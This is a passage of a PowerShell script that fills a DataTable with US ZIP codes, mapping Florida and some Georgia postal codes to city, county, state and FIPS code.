$Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33621") + $null = $Cities.Rows.Add("Carrollwood","Hillsborough","Florida","FL","12","33624") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33625") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33626") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33629") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33634") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33635") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33637") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33647") + $null = $Cities.Rows.Add("Zcta 336hh","Hillsborough","Florida","FL","12","336HH") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33701") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33702") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33703") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33704") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33705") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33706") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33707") + $null = $Cities.Rows.Add("Madeira beach","Pinellas","Florida","FL","12","33708") + $null = $Cities.Rows.Add("Kenneth city","Pinellas","Florida","FL","12","33709") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33710") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33711") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33712") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33713") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33714") + $null = $Cities.Rows.Add("Tierra verde","Pinellas","Florida","FL","12","33715") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33716") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33755") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33756") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33759") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33760") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33761") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33762") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33763") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33764") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33765") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33767") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33770") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33771") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33772") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33773") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33774") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33776") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33777") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33778") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33781") + $null = $Cities.Rows.Add("Saint petersburg","Pinellas","Florida","FL","12","33782") + $null = $Cities.Rows.Add("Zcta 33785","Pinellas","Florida","FL","12","33785") + $null = $Cities.Rows.Add("Zcta 33786","Pinellas","Florida","FL","12","33786") + $null = $Cities.Rows.Add("Zcta 337hh","Pinellas","Florida","FL","12","337HH") + $null = $Cities.Rows.Add("Lakeland","Polk","Florida","FL","12","33801") + $null = $Cities.Rows.Add("Lakeland","Polk","Florida","FL","12","33803") + $null = $Cities.Rows.Add("Lakeland","Polk","Florida","FL","12","33805") + $null = $Cities.Rows.Add("Lakeland","Polk","Florida","FL","12","33809") + $null = $Cities.Rows.Add("Zcta 33810","Polk","Florida","FL","12","33810") + $null = $Cities.Rows.Add("Southside","Polk","Florida","FL","12","33811") + $null = $Cities.Rows.Add("Southside","Polk","Florida","FL","12","33813") + $null = $Cities.Rows.Add("Zcta 33815","Polk","Florida","FL","12","33815") + $null = $Cities.Rows.Add("Auburndale","Polk","Florida","FL","12","33823") + $null = $Cities.Rows.Add("Avon park","Highlands","Florida","FL","12","33825") + $null = $Cities.Rows.Add("Babson park","Polk","Florida","FL","12","33827") + $null = $Cities.Rows.Add("Bartow","Polk","Florida","FL","12","33830") + $null = $Cities.Rows.Add("Duette","Hardee","Florida","FL","12","33834") + $null = $Cities.Rows.Add("Bradley","Polk","Florida","FL","12","33835") + $null = $Cities.Rows.Add("Davenport","Polk","Florida","FL","12","33837") + $null = $Cities.Rows.Add("Dundee","Polk","Florida","FL","12","33838") + $null = $Cities.Rows.Add("Eagle lake","Polk","Florida","FL","12","33839") + $null = $Cities.Rows.Add("Fort meade","Polk","Florida","FL","12","33841") + $null = $Cities.Rows.Add("Frostproof","Polk","Florida","FL","12","33843") + $null = $Cities.Rows.Add("Grenelefe","Polk","Florida","FL","12","33844") + $null = $Cities.Rows.Add("Homeland","Polk","Florida","FL","12","33847") + $null = $Cities.Rows.Add("Intercession cit","Osceola","Florida","FL","12","33848") + $null = $Cities.Rows.Add("Kathleen","Polk","Florida","FL","12","33849") + $null = $Cities.Rows.Add("Lake alfred","Polk","Florida","FL","12","33850") + $null = $Cities.Rows.Add("Lake hamilton","Polk","Florida","FL","12","33851") + $null = $Cities.Rows.Add("Lake placid","Highlands","Florida","FL","12","33852") + $null = $Cities.Rows.Add("Lake wales","Polk","Florida","FL","12","33853") + $null = $Cities.Rows.Add("Lorida","Highlands","Florida","FL","12","33857") + $null = $Cities.Rows.Add("Mulberry","Polk","Florida","FL","12","33860") + $null = $Cities.Rows.Add("Ona","Hardee","Florida","FL","12","33865") + $null = $Cities.Rows.Add("Polk city","Polk","Florida","FL","12","33868") + $null = $Cities.Rows.Add("Sebring","Highlands","Florida","FL","12","33870") + $null = $Cities.Rows.Add("Sebring","Highlands","Florida","FL","12","33872") + $null = $Cities.Rows.Add("Wauchula","Hardee","Florida","FL","12","33873") + $null = $Cities.Rows.Add("Waverly","Polk","Florida","FL","12","33877") + $null = $Cities.Rows.Add("Eloise","Polk","Florida","FL","12","33880") + $null = $Cities.Rows.Add("Winter haven","Polk","Florida","FL","12","33881") + $null = $Cities.Rows.Add("Cypress gardens","Polk","Florida","FL","12","33884") + $null = $Cities.Rows.Add("Zolfo springs","Hardee","Florida","FL","12","33890") + $null = $Cities.Rows.Add("Zcta 338hh","Highlands","Florida","FL","12","338HH") + $null = $Cities.Rows.Add("Zcta 338xx","Highlands","Florida","FL","12","338XX") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33901") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33903") + $null = $Cities.Rows.Add("Cape coral centr","Lee","Florida","FL","12","33904") + $null = $Cities.Rows.Add("Tice","Lee","Florida","FL","12","33905") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33907") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33908") + $null = $Cities.Rows.Add("Cape coral centr","Lee","Florida","FL","12","33909") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33912") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33913") + $null = $Cities.Rows.Add("Cape coral centr","Lee","Florida","FL","12","33914") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33916") + $null = $Cities.Rows.Add("Fort myers","Lee","Florida","FL","12","33917") + $null = $Cities.Rows.Add("College parkway","Lee","Florida","FL","12","33919") + $null = $Cities.Rows.Add("Alva","Lee","Florida","FL","12","33920") + $null = $Cities.Rows.Add("Boca grande","Lee","Florida","FL","12","33921") + $null = $Cities.Rows.Add("Bokeelia","Lee","Florida","FL","12","33922") + $null = $Cities.Rows.Add("Captiva","Lee","Florida","FL","12","33924") + $null = $Cities.Rows.Add("Estero","Lee","Florida","FL","12","33928") + $null = $Cities.Rows.Add("Felda","Hendry","Florida","FL","12","33930") + $null = $Cities.Rows.Add("Fort myers beach","Lee","Florida","FL","12","33931") + $null = $Cities.Rows.Add("Labelle","Hendry","Florida","FL","12","33935") + $null = $Cities.Rows.Add("Lehigh acres","Lee","Florida","FL","12","33936") + $null = $Cities.Rows.Add("Palmdale","Glades","Florida","FL","12","33944") + $null = $Cities.Rows.Add("Pineland","Lee","Florida","FL","12","33945") + $null = $Cities.Rows.Add("Placida","Charlotte","Florida","FL","12","33946") + $null = $Cities.Rows.Add("Placida","Charlotte","Florida","FL","12","33947") + $null = $Cities.Rows.Add("Port charlotte","Charlotte","Florida","FL","12","33948") + $null = $Cities.Rows.Add("Punta gorda","Charlotte","Florida","FL","12","33950") + $null = $Cities.Rows.Add("Port charlotte","Charlotte","Florida","FL","12","33952") + $null = $Cities.Rows.Add("Port charlotte","Charlotte","Florida","FL","12","33953") + $null = $Cities.Rows.Add("Port charlotte","Charlotte","Florida","FL","12","33954") + $null = $Cities.Rows.Add("Punta gorda","Charlotte","Florida","FL","12","33955") + $null = $Cities.Rows.Add("Saint james city","Lee","Florida","FL","12","33956") + $null = $Cities.Rows.Add("Sanibel","Lee","Florida","FL","12","33957") + $null = $Cities.Rows.Add("Venus","Highlands","Florida","FL","12","33960") + $null = $Cities.Rows.Add("Lehigh acres","Lee","Florida","FL","12","33971") + $null = $Cities.Rows.Add("Zcta 33972","Lee","Florida","FL","12","33972") + $null = $Cities.Rows.Add("Zcta 33975","Hendry","Florida","FL","12","33975") + $null = $Cities.Rows.Add("Port charlotte","Charlotte","Florida","FL","12","33980") + $null = $Cities.Rows.Add("Port charlotte","Charlotte","Florida","FL","12","33981") + $null = $Cities.Rows.Add("Punta gorda","Charlotte","Florida","FL","12","33982") + $null = $Cities.Rows.Add("Punta gorda","Charlotte","Florida","FL","12","33983") + $null = $Cities.Rows.Add("Cape coral centr","Lee","Florida","FL","12","33990") + $null = $Cities.Rows.Add("Cape coral centr","Lee","Florida","FL","12","33991") + $null = $Cities.Rows.Add("Zcta 33993","Lee","Florida","FL","12","33993") + $null = $Cities.Rows.Add("Zcta 339hh","Charlotte","Florida","FL","12","339HH") + $null = $Cities.Rows.Add("Zcta 339xx","Charlotte","Florida","FL","12","339XX") + $null = $Cities.Rows.Add("Zcta 34102","Collier","Florida","FL","12","34102") + $null = $Cities.Rows.Add("Zcta 34103","Collier","Florida","FL","12","34103") + $null = $Cities.Rows.Add("Zcta 34104","Collier","Florida","FL","12","34104") + $null = $Cities.Rows.Add("Zcta 34105","Collier","Florida","FL","12","34105") + $null = $Cities.Rows.Add("Zcta 34108","Collier","Florida","FL","12","34108") + $null = $Cities.Rows.Add("Zcta 34109","Collier","Florida","FL","12","34109") + $null = $Cities.Rows.Add("Zcta 34110","Collier","Florida","FL","12","34110") + $null = $Cities.Rows.Add("Zcta 34112","Collier","Florida","FL","12","34112") + $null = $Cities.Rows.Add("Zcta 34113","Collier","Florida","FL","12","34113") + $null = $Cities.Rows.Add("Zcta 34114","Collier","Florida","FL","12","34114") + $null = $Cities.Rows.Add("Zcta 34116","Collier","Florida","FL","12","34116") + $null = $Cities.Rows.Add("Zcta 34117","Collier","Florida","FL","12","34117") + $null = $Cities.Rows.Add("Zcta 34119","Collier","Florida","FL","12","34119") + $null = $Cities.Rows.Add("Zcta 34120","Collier","Florida","FL","12","34120") + $null = $Cities.Rows.Add("Zcta 34134","Lee","Florida","FL","12","34134") + $null = $Cities.Rows.Add("Zcta 34135","Lee","Florida","FL","12","34135") + $null = $Cities.Rows.Add("Zcta 34137","Collier","Florida","FL","12","34137") + $null = $Cities.Rows.Add("Zcta 34138","Collier","Florida","FL","12","34138") + $null = $Cities.Rows.Add("Zcta 34139","Collier","Florida","FL","12","34139") + $null = $Cities.Rows.Add("Zcta 34141","Collier","Florida","FL","12","34141") + $null = $Cities.Rows.Add("Zcta 34142","Collier","Florida","FL","12","34142") + $null = $Cities.Rows.Add("Zcta 34145","Collier","Florida","FL","12","34145") + $null = $Cities.Rows.Add("Zcta 341hh","Collier","Florida","FL","12","341HH") + $null = $Cities.Rows.Add("Zcta 341xx","Monroe","Florida","FL","12","341XX") + $null = $Cities.Rows.Add("Braden river","Manatee","Florida","FL","12","34201") + $null = $Cities.Rows.Add("Braden river","Manatee","Florida","FL","12","34202") + $null = $Cities.Rows.Add("Braden river","Manatee","Florida","FL","12","34203") + $null = $Cities.Rows.Add("Westgate","Manatee","Florida","FL","12","34205") + $null = $Cities.Rows.Add("College plaza","Manatee","Florida","FL","12","34207") + $null = $Cities.Rows.Add("Braden river","Manatee","Florida","FL","12","34208") + $null = $Cities.Rows.Add("Palma sola","Manatee","Florida","FL","12","34209") + $null = $Cities.Rows.Add("Bradenton","Manatee","Florida","FL","12","34210") + $null = $Cities.Rows.Add("Cortez","Manatee","Florida","FL","12","34215") + $null = $Cities.Rows.Add("Anna maria","Manatee","Florida","FL","12","34216") + $null = $Cities.Rows.Add("Bradenton beach","Manatee","Florida","FL","12","34217") + $null = $Cities.Rows.Add("Parrish","Manatee","Florida","FL","12","34219") + $null = $Cities.Rows.Add("Palmetto","Manatee","Florida","FL","12","34221") + $null = $Cities.Rows.Add("Ellenton","Manatee","Florida","FL","12","34222") + $null = $Cities.Rows.Add("Englewood","Sarasota","Florida","FL","12","34223") + $null = $Cities.Rows.Add("Grove city","Charlotte","Florida","FL","12","34224") + $null = $Cities.Rows.Add("Whitney beach","Sarasota","Florida","FL","12","34228") + $null = $Cities.Rows.Add("Osprey","Sarasota","Florida","FL","12","34229") + $null = $Cities.Rows.Add("South trail","Sarasota","Florida","FL","12","34231") + $null = $Cities.Rows.Add("Forest lakes","Sarasota","Florida","FL","12","34232") + $null = $Cities.Rows.Add("Sarasota","Sarasota","Florida","FL","12","34233") + $null = $Cities.Rows.Add("Meadows village","Sarasota","Florida","FL","12","34234") + $null = $Cities.Rows.Add("Sarasota","Sarasota","Florida","FL","12","34235") + $null = $Cities.Rows.Add("Sarasota","Sarasota","Florida","FL","12","34236") + $null = $Cities.Rows.Add("Sarasota","Sarasota","Florida","FL","12","34237") + $null = $Cities.Rows.Add("Sarasota square","Sarasota","Florida","FL","12","34238") + $null = $Cities.Rows.Add("Sarasota","Sarasota","Florida","FL","12","34239") + $null = $Cities.Rows.Add("Sarasota","Sarasota","Florida","FL","12","34240") + $null = $Cities.Rows.Add("Sarasota","Sarasota","Florida","FL","12","34241") + $null = $Cities.Rows.Add("Crescent beach","Sarasota","Florida","FL","12","34242") + $null = $Cities.Rows.Add("Sarasota","Manatee","Florida","FL","12","34243") + $null = $Cities.Rows.Add("Terra ceia","Manatee","Florida","FL","12","34250") + $null = $Cities.Rows.Add("Myakka city","Manatee","Florida","FL","12","34251") + $null = $Cities.Rows.Add("Zcta 34266","DeSoto","Florida","FL","12","34266") + $null = $Cities.Rows.Add("Zcta 34268","DeSoto","Florida","FL","12","34268") + $null = $Cities.Rows.Add("Nokomis","Sarasota","Florida","FL","12","34275") + $null = $Cities.Rows.Add("Venice","Sarasota","Florida","FL","12","34285") + $null = $Cities.Rows.Add("Zcta 34286","Sarasota","Florida","FL","12","34286") + $null = $Cities.Rows.Add("North port","Sarasota","Florida","FL","12","34287") + $null = $Cities.Rows.Add("Mid venice","Sarasota","Florida","FL","12","34292") + $null = $Cities.Rows.Add("South venice","Sarasota","Florida","FL","12","34293") + $null = $Cities.Rows.Add("Zcta 342hh","Charlotte","Florida","FL","12","342HH") + $null = $Cities.Rows.Add("Zcta 342xx","Sarasota","Florida","FL","12","342XX") + $null = $Cities.Rows.Add("Belleview","Marion","Florida","FL","12","34420") + $null = $Cities.Rows.Add("Crystal river","Citrus","Florida","FL","12","34428") + $null = $Cities.Rows.Add("Crystal river","Citrus","Florida","FL","12","34429") + $null = $Cities.Rows.Add("Dunnellon","Marion","Florida","FL","12","34431") + $null = $Cities.Rows.Add("Dunnellon","Marion","Florida","FL","12","34432") + $null = $Cities.Rows.Add("Citrus springs","Citrus","Florida","FL","12","34433") + $null = $Cities.Rows.Add("Citrus springs","Citrus","Florida","FL","12","34434") + $null = $Cities.Rows.Add("Floral city","Citrus","Florida","FL","12","34436") + $null = $Cities.Rows.Add("Hernando","Citrus","Florida","FL","12","34442") + $null = $Cities.Rows.Add("Homosassa","Citrus","Florida","FL","12","34446") + $null = $Cities.Rows.Add("Homosassa","Citrus","Florida","FL","12","34448") + $null = $Cities.Rows.Add("Inglis","Levy","Florida","FL","12","34449") + $null = $Cities.Rows.Add("Inverness","Citrus","Florida","FL","12","34450") + $null = $Cities.Rows.Add("Inverness","Citrus","Florida","FL","12","34452") + $null = $Cities.Rows.Add("Inverness","Citrus","Florida","FL","12","34453") + $null = $Cities.Rows.Add("Lecanto","Citrus","Florida","FL","12","34461") + $null = $Cities.Rows.Add("Beverly hills","Citrus","Florida","FL","12","34465") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34470") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34471") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34472") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34473") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34474") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34475") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34476") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34479") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34480") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34481") + $null = $Cities.Rows.Add("Ocala","Marion","Florida","FL","12","34482") + $null = $Cities.Rows.Add("Oxford","Sumter","Florida","FL","12","34484") + $null = $Cities.Rows.Add("Silver springs","Marion","Florida","FL","12","34488") + $null = $Cities.Rows.Add("Summerfield","Marion","Florida","FL","12","34491") + $null = $Cities.Rows.Add("Yankeetown","Levy","Florida","FL","12","34498") + $null = $Cities.Rows.Add("Zcta 344hh","Citrus","Florida","FL","12","344HH") + $null = $Cities.Rows.Add("Zcta 344xx","Levy","Florida","FL","12","344XX") + $null = $Cities.Rows.Add("Brooksville","Hernando","Florida","FL","12","34601") + $null = $Cities.Rows.Add("Ridge manor west","Hernando","Florida","FL","12","34602") + $null = $Cities.Rows.Add("Spring hill","Hernando","Florida","FL","12","34606") + $null = $Cities.Rows.Add("Spring hill","Hernando","Florida","FL","12","34607") + $null = $Cities.Rows.Add("Spring hill","Hernando","Florida","FL","12","34608") + $null = $Cities.Rows.Add("Spring hill","Hernando","Florida","FL","12","34609") + $null = $Cities.Rows.Add("Shady hills","Pasco","Florida","FL","12","34610") + $null = $Cities.Rows.Add("Brooksville","Hernando","Florida","FL","12","34613") + $null = $Cities.Rows.Add("Brooksville","Hernando","Florida","FL","12","34614") + $null = $Cities.Rows.Add("Land o lakes","Pasco","Florida","FL","12","34639") + $null = $Cities.Rows.Add("New port richey","Pasco","Florida","FL","12","34652") + $null = $Cities.Rows.Add("New port richey","Pasco","Florida","FL","12","34653") + $null = $Cities.Rows.Add("New port richey","Pasco","Florida","FL","12","34654") + $null = $Cities.Rows.Add("New port richey","Pasco","Florida","FL","12","34655") + $null = $Cities.Rows.Add("Nobleton","Hernando","Florida","FL","12","34661") + $null = $Cities.Rows.Add("Hudson","Pasco","Florida","FL","12","34667") + $null = $Cities.Rows.Add("Port richey","Pasco","Florida","FL","12","34668") + $null = $Cities.Rows.Add("Hudson","Pasco","Florida","FL","12","34669") + $null = $Cities.Rows.Add("Oldsmar","Pinellas","Florida","FL","12","34677") + $null = $Cities.Rows.Add("Aripeka","Pasco","Florida","FL","12","34679") + $null = $Cities.Rows.Add("Crystal beach","Pinellas","Florida","FL","12","34681") + $null = $Cities.Rows.Add("Palm harbor","Pinellas","Florida","FL","12","34683") + $null = $Cities.Rows.Add("Lake tarpon","Pinellas","Florida","FL","12","34684") + $null = $Cities.Rows.Add("Palm harbor","Pinellas","Florida","FL","12","34685") + $null = $Cities.Rows.Add("Tarpon springs","Pinellas","Florida","FL","12","34689") + $null = $Cities.Rows.Add("Holiday","Pasco","Florida","FL","12","34690") + $null = $Cities.Rows.Add("Holiday","Pasco","Florida","FL","12","34691") + $null = $Cities.Rows.Add("Safety harbor","Pinellas","Florida","FL","12","34695") + $null = $Cities.Rows.Add("Dunedin","Pinellas","Florida","FL","12","34698") + $null = $Cities.Rows.Add("Zcta 346hh","Hernando","Florida","FL","12","346HH") + $null = $Cities.Rows.Add("Zcta 346xx","Pasco","Florida","FL","12","346XX") + $null = $Cities.Rows.Add("Astatula","Lake","Florida","FL","12","34705") + $null = $Cities.Rows.Add("Clermont","Lake","Florida","FL","12","34711") + $null = $Cities.Rows.Add("Fruitland park","Lake","Florida","FL","12","34731") + $null = $Cities.Rows.Add("Gotha","Orange","Florida","FL","12","34734") + $null = $Cities.Rows.Add("Groveland","Lake","Florida","FL","12","34736") + $null = $Cities.Rows.Add("Howey in the hil","Lake","Florida","FL","12","34737") + $null = $Cities.Rows.Add("Kenansville","Osceola","Florida","FL","12","34739") + $null = $Cities.Rows.Add("Kissimmee","Osceola","Florida","FL","12","34741") + $null = $Cities.Rows.Add("Buena ventura la","Osceola","Florida","FL","12","34743") + $null = $Cities.Rows.Add("Kissimmee","Osceola","Florida","FL","12","34744") + $null = $Cities.Rows.Add("Kissimmee","Osceola","Florida","FL","12","34746") + $null = $Cities.Rows.Add("Kissimmee","Osceola","Florida","FL","12","34747") + $null = $Cities.Rows.Add("Leesburg","Lake","Florida","FL","12","34748") + $null = $Cities.Rows.Add("Mascotte","Lake","Florida","FL","12","34753") + $null = $Cities.Rows.Add("Montverde","Lake","Florida","FL","12","34756") + $null = $Cities.Rows.Add("Kissimmee","Osceola","Florida","FL","12","34758") + $null = $Cities.Rows.Add("Poinciana","Polk","Florida","FL","12","34759") + $null = $Cities.Rows.Add("Oakland","Orange","Florida","FL","12","34760") + $null = $Cities.Rows.Add("Ocoee","Orange","Florida","FL","12","34761") + $null = $Cities.Rows.Add("Okahumpka","Lake","Florida","FL","12","34762") + $null = $Cities.Rows.Add("Saint cloud","Osceola","Florida","FL","12","34769") + $null = $Cities.Rows.Add("Saint cloud","Osceola","Florida","FL","12","34771") + $null = $Cities.Rows.Add("Saint cloud","Osceola","Florida","FL","12","34772") + $null = $Cities.Rows.Add("Saint cloud","Osceola","Florida","FL","12","34773") + $null = $Cities.Rows.Add("Wildwood","Sumter","Florida","FL","12","34785") + $null = $Cities.Rows.Add("Windermere","Orange","Florida","FL","12","34786") + $null = $Cities.Rows.Add("Winter garden","Orange","Florida","FL","12","34787") + $null = $Cities.Rows.Add("Haines creek","Lake","Florida","FL","12","34788") + $null = $Cities.Rows.Add("Yalaha","Lake","Florida","FL","12","34797") + $null = $Cities.Rows.Add("Zcta 347hh","Lake","Florida","FL","12","347HH") + $null = $Cities.Rows.Add("Zcta 347xx","Osceola","Florida","FL","12","347XX") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34945") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34946") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34947") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34949") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34950") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34951") + $null = $Cities.Rows.Add("Port saint lucie","St. Lucie","Florida","FL","12","34952") + $null = $Cities.Rows.Add("Port saint lucie","St. Lucie","Florida","FL","12","34953") + $null = $Cities.Rows.Add("Indiantown","Martin","Florida","FL","12","34956") + $null = $Cities.Rows.Add("Jensen beach","Martin","Florida","FL","12","34957") + $null = $Cities.Rows.Add("Basinger","Okeechobee","Florida","FL","12","34972") + $null = $Cities.Rows.Add("Okeechobee","Okeechobee","Florida","FL","12","34974") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34981") + $null = $Cities.Rows.Add("Fort pierce","St. Lucie","Florida","FL","12","34982") + $null = $Cities.Rows.Add("Port saint lucie","St. Lucie","Florida","FL","12","34983") + $null = $Cities.Rows.Add("Port saint lucie","St. Lucie","Florida","FL","12","34984") + $null = $Cities.Rows.Add("Port saint lucie","St. Lucie","Florida","FL","12","34986") + $null = $Cities.Rows.Add("Port saint lucie","St. Lucie","Florida","FL","12","34987") + $null = $Cities.Rows.Add("Palm city","Martin","Florida","FL","12","34990") + $null = $Cities.Rows.Add("Stuart","Martin","Florida","FL","12","34994") + $null = $Cities.Rows.Add("Stuart","Martin","Florida","FL","12","34996") + $null = $Cities.Rows.Add("Stuart","Martin","Florida","FL","12","34997") + $null = $Cities.Rows.Add("Zcta 349hh","Glades","Florida","FL","12","349HH") + $null = $Cities.Rows.Add("Zcta 349xx","Martin","Florida","FL","12","349XX") + $null = $Cities.Rows.Add("Avondale estates","DeKalb","Georgia","GA","13","30002") + $null = $Cities.Rows.Add("Zcta 30004","Fulton","Georgia","GA","13","30004") + $null = $Cities.Rows.Add("Zcta 30005","Fulton","Georgia","GA","13","30005") + $null = $Cities.Rows.Add("Zcta 30008","Cobb","Georgia","GA","13","30008") + $null = $Cities.Rows.Add("Zcta 30011","Barrow","Georgia","GA","13","30011") + $null = $Cities.Rows.Add("Zcta 30012","Rockdale","Georgia","GA","13","30012") + $null = $Cities.Rows.Add("Zcta 30013","Rockdale","Georgia","GA","13","30013") + $null = $Cities.Rows.Add("Zcta 30014","Newton","Georgia","GA","13","30014") + $null = $Cities.Rows.Add("Zcta 30016","Newton","Georgia","GA","13","30016") + $null = $Cities.Rows.Add("Zcta 30017","Gwinnett","Georgia","GA","13","30017") + $null = $Cities.Rows.Add("Zcta 30019","Gwinnett","Georgia","GA","13","30019") + $null = $Cities.Rows.Add("Clarkston","DeKalb","Georgia","GA","13","30021") + $null = $Cities.Rows.Add("Zcta 30022","Fulton","Georgia","GA","13","30022") + $null = $Cities.Rows.Add("Zcta 30024","Gwinnett","Georgia","GA","13","30024") + $null = $Cities.Rows.Add("Zcta 30025","Walton","Georgia","GA","13","30025") + $null = $Cities.Rows.Add("Decatur","DeKalb","Georgia","GA","13","30030") + $null = $Cities.Rows.Add("Decatur","DeKalb","Georgia","GA","13","30032") + $null = $Cities.Rows.Add("Decatur","DeKalb","Georgia","GA","13","30033") + $null = $Cities.Rows.Add("Decatur","DeKalb","Georgia","GA","13","30034") + $null = $Cities.Rows.Add("Decatur","DeKalb","Georgia","GA","13","30035") + $null = $Cities.Rows.Add("Lithonia","DeKalb","Georgia","GA","13","30038") + $null = $Cities.Rows.Add("Zcta 30039","Gwinnett","Georgia","GA","13","30039") + $null = $Cities.Rows.Add("Zcta 30040","Forsyth","Georgia","GA","13","30040") + $null = $Cities.Rows.Add("Zcta 30041","Forsyth","Georgia","GA","13","30041") + $null = $Cities.Rows.Add("Zcta 30043","Gwinnett","Georgia","GA","13","30043") + $null = $Cities.Rows.Add("Zcta 30044","Gwinnett","Georgia","GA","13","30044") + $null = $Cities.Rows.Add("Zcta 30045","Gwinnett","Georgia","GA","13","30045") + $null = $Cities.Rows.Add("Zcta 30047","Gwinnett","Georgia","GA","13","30047") + $null = $Cities.Rows.Add("Zcta 30052","Walton","Georgia","GA","13","30052") + $null = $Cities.Rows.Add("Zcta 30054","Newton","Georgia","GA","13","30054") + $null = $Cities.Rows.Add("Zcta 30055","Newton","Georgia","GA","13","30055") + $null = $Cities.Rows.Add("Zcta 30056","Jasper","Georgia","GA","13","30056") + $null = $Cities.Rows.Add("Centerville gwin","DeKalb","Georgia","GA","13","30058") + $null = $Cities.Rows.Add("Marietta","Cobb","Georgia","GA","13","30060") + $null = $Cities.Rows.Add("Marietta","Cobb","Georgia","GA","13","30062") + $null = $Cities.Rows.Add("Marietta","Cobb","Georgia","GA","13","30064") + $null = $Cities.Rows.Add("Marietta","Cobb","Georgia","GA","13","30066") + $null = $Cities.Rows.Add("Marietta","Cobb","Georgia","GA","13","30067") + $null = $Cities.Rows.Add("Marietta","Cobb","Georgia","GA","13","30068") + $null = $Cities.Rows.Add("Zcta 30070","Newton","Georgia","GA","13","30070") + $null = $Cities.Rows.Add("Norcross","Gwinnett","Georgia","GA","13","30071") + $null = $Cities.Rows.Add("Pine lake","DeKalb","Georgia","GA","13","30072") + $null = $Cities.Rows.Add("Roswell","Fulton","Georgia","GA","13","30075") + $null = $Cities.Rows.Add("Roswell","Fulton","Georgia","GA","13","30076") + $null = $Cities.Rows.Add("Zcta 30078","Gwinnett","Georgia","GA","13","30078") + $null = $Cities.Rows.Add("Scottdale","DeKalb","Georgia","GA","13","30079") + $null = $Cities.Rows.Add("Smyrna","Cobb","Georgia","GA","13","30080") + $null = $Cities.Rows.Add("Smyrna","Cobb","Georgia","GA","13","30082") + $null = $Cities.Rows.Add("Stone mountain","DeKalb","Georgia","GA","13","30083") + $null = $Cities.Rows.Add("Tucker","DeKalb","Georgia","GA","13","30084") + $null = $Cities.Rows.Add("Stone mountain","DeKalb","Georgia","GA","13","30087") + $null = $Cities.Rows.Add("Stone mountain","DeKalb","Georgia","GA","13","30088") + 